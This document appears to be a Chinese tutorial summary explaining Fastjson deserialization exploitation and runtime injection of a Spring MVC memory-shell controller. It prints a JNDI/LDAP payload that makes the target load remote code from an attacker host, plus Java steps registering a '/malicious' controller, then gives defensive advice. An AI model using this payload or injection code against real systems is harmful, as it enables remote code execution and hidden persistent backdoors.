利用 Fastjson 注入 Spring 内存马，太秀了～！（csdn）————程序.pdf

【Fastjson 反序列化与 Spring 内存马注入】 Fastjson 是阿里巴巴开发的一个高性能的 Java JSON 库，用于处理 JSON 数据。然而，Fastjson 在某些版本中存在反序列化安全漏洞，允许攻击者通过精心构造的 JSON 字符串来执行任意代码。这种攻击方式被称为 Fastjson 反序列化注入。在本文中，我们将探讨如何利用 Fastjson 的这个漏洞在 Spring MVC 应用中注入内存马。 **1. Fastjson 反序列化漏洞** Fastjson 在反序列化 JSON 对象时，如果遇到 "@type" 注解，它会尝试使用 Java 反射来创建指定类型的对象。这个特性在某些情况下可能被滥用，特别是当 "@type" 指向一个可以执行任意代码的类时。例如，利用 JNDI (Java Naming and Directory Interface) 来加载远程资源，攻击者可以指定恶意的 dataSourceName，使得应用在反序列化过程中连接到攻击者控制的 LDAP 服务器，下载并执行恶意代码。 以下是一个简单的 POC (Proof of Concept) JSON 字符串，展示了如何利用 Fastjson 的反序列化漏洞： ```json {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://192.168.x.x:1389/Exploit","autoCommit":true} ``` 当这个 JSON 字符串被 Fastjson 反序列化时，会尝试创建 `com.sun.rowset.JdbcRowSetImpl` 类的对象，并通过 JNDI 调用指定的 LDAP 服务器地址，从而实现远程代码执行。 **2. Spring MVC 中的内存马注入** Spring MVC 是一个用于构建 Web 应用的框架，它允许开发者使用注解（如 `@RequestMapping`）来处理 HTTP 请求。通常情况下，控制器是在应用启动时静态注册的。但是，通过一些技巧，我们可以在应用运行时动态地向 Spring MVC 注册新的控制器。 以下是一段示例代码，展示了如何动态注入一个名为 `InjectToController` 的控制器： 1. 获取 Spring 上下文（`WebApplicationContext`）： ```java WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0); ``` 2. 获取 `RequestMappingHandlerMapping` 实例： ```java RequestMappingHandlerMapping mappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class); ``` 3. 通过反射获取控制器类的方法： ```java Method method2 = InjectToController.class.getMethod("test"); ``` 4. 定义控制器的 URL 和 HTTP 方法： ```java PatternsRequestCondition url = new PatternsRequestCondition("/malicious"); RequestMethodsRequestCondition ms = new RequestMethodsRequestCondition(); ``` 5. 创建 `RequestMappingInfo` 并注册控制器： ```java RequestMappingInfo info = new RequestMappingInfo(url, ms, null, null, null, null, null); InjectToController injectToController = new InjectToController("aaa"); mappingHandlerMapping.registerMapping(info, injectToController, method2); ``` 通过上述步骤，攻击者可以动态地将恶意控制器添加到 Spring MVC 中，从而控制应用的行为。 请注意，这些操作通常需要对应用有较高的权限，例如通过已经存在的漏洞或恶意代码来获取。因此，确保应用程序的安全性至关重要，包括定期更新库到最新安全版本，以及使用安全的反序列化策略。 Fastjson 反序列化漏洞和 Spring MVC 动态注入控制器的概念可以结合起来，构建出一种无文件落地的内存马注入攻击。防范这种攻击的关键在于：避免使用易受攻击的 Fastjson 版本，对 JSON 输入进行严格的输入验证，以及限制应用程序的动态注册行为。